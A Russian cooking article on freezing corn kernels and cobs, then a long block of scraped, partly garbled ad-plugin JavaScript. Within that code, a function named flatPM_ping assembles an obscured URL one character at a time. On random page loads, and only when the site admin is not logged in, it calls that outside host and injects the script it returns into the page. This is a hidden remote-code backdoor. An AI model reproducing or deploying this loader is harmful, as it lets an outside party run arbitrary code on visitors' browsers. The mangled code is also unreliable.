Некоторые кулинары предпочитают после отваривания остужать кочаны в течение 3–4 минут в ледяной воде. Замораживают их после обсушки на полотенце из бумаги.

В зёрнах

Этот вариант хорош тем, что позволяет сэкономить место в морозильной камере. Очищенные сухие зёрна нужно поместить в пластиковые ёмкости либо пакеты, разровнять и отправить на заморозку. Как и початки, зёрна можно замораживать после бланшировки. Для этого нужно предварительно отварить кочаны (технологию мы описывали в предыдущем подразделе), остудить и отделить зёрнышки. Затем следует разложить их небольшими порциями по пакетам, выпустить воздух, разровнять в один слой и хорошо загерметизировать.

Видео: заморозка зёрен кукурузы

Сколько можно хранить

Замороженный продукт может сохраняться без утраты полезных веществ на протяжении 6–8 месяцев: в дальнейшем их количество будет снижаться. Употреблять продукт можно на протяжении года. В размороженном виде кукурузу необходимо съесть в течение 1–2 суток.

Как можно использовать

Кукурузу, замороженную в початках, можно есть целиком, использовать для приготовления первых блюд. Из продукта, замороженного в зёрнах, удобно готовить рагу, запеканки, салаты, добавлять в детское меню, а также использовать для украшения различных блюд и др.

Нужно ли размораживать перед использованием

Если кукуруза используется в блюдах с термической обработкой, то размораживать её не нужно. Её сразу же следует бросить в кипяток и варить до мягкого состояния зёрен на протяжении 20–40 минут. При применении продукта, который был отварен до заморозки, его нужно поместить в кипящую воду и прокипятить 3–4 минуты. Также возможно помещение кочанов и зёрен в микроволновку, где следует включить режим «Разморозка». Замороженные зёрна добавляются в блюда без размораживания.

Таким образом, отличным способом сохранения кукурузы на длительное время является замораживание. В результате этой несложной процедуры в овоще остаётся максимальное количество ценных элементов. Каждый кулинар может решить, удобен ли для него тот или иной вариант, ведь замораживать кукурузу можно несколькими способами: в початках и в зёрнах, без варки и после отваривания.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};